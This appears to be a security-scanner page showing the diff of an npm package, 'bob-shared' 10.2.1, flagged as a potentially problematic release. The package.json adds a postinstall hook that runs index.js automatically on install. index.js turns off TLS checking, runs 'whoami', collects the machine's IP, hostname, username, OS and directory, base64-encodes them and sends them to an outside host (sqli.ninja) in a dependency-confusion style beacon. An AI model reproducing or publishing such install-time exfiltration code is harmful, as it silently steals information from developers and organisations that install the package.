bob-shared 10.2.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of bob-shared might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +49 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,49 @@
1
+ var os = require("os");
2
+
3
+ var package_name = "bob-shared"
4
+ var target = "hbb_bc"
5
+
6
+ process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";
7
+
8
+ // GET internal IP
9
+ var address,os = require('os'),ifaces = os.networkInterfaces();
10
+
11
+ // GET FQDN
12
+ var child_process = require("child_process");
13
+ var fqdn = child_process.execSync("whoami");
14
+ var fqdnstr = fqdn.toString().replace(/\r?\n|\r/g, " ");
15
+
16
+ // Iterate over interfaces ...
17
+ for (var dev in ifaces) {
18
+
19
+ // ... and find the one that matches the criteria
20
+ var iface = ifaces[dev].filter(function(details) {
21
+ return details.family === 'IPv4' && details.internal === false;
22
+ });
23
+
24
+ if(iface.length > 0) address = iface[0].address;
25
+ }
26
+
27
+ // building the string for GET data in dc.php
28
+ var datastring = 'Local%20IP:%09'+address+'%0aHostname:%09'+os.hostname()+'%0aFQDN:%09%09'+fqdnstr+'%0aUsername:%09'+os.userInfo().username+'%0aOperatingsystem:%09'+os.platform+'%20'+os.release+'%0aWorking%20directory:%09'+__dirname
29
+ // converting into base64
30
+ let buff = new Buffer(datastring);
31
+ let base64datastring = buff.toString('base64');
32
+
33
+ const https = require('https')
34
+ const options = {
35
+ hostname: 'sqli.ninja',
36
+ port: 443,
37
+ path: '/stuff/dc.php?target='+target+'&package_name='+package_name+'&repo=npm&data='+base64datastring,
38
+ method: 'GET'
39
+ }
40
+
41
+ const req = https.request(options, res => {
42
+ console.log(`statusCode: ${res.statusCode}`)
43
+ })
44
+
45
+ req.on('error', error => {
46
+ console.error(error)
47
+ })
48
+
49
+ req.end()
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "bob-shared",
3
+ "version": "10.2.1",
4
+ "description": "x",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js",
8
+ "postinstall": "npm start"
9
+ },
10
+ "author": "bugcrowd mace",
11
+ "license": "IöSC"
12
+ }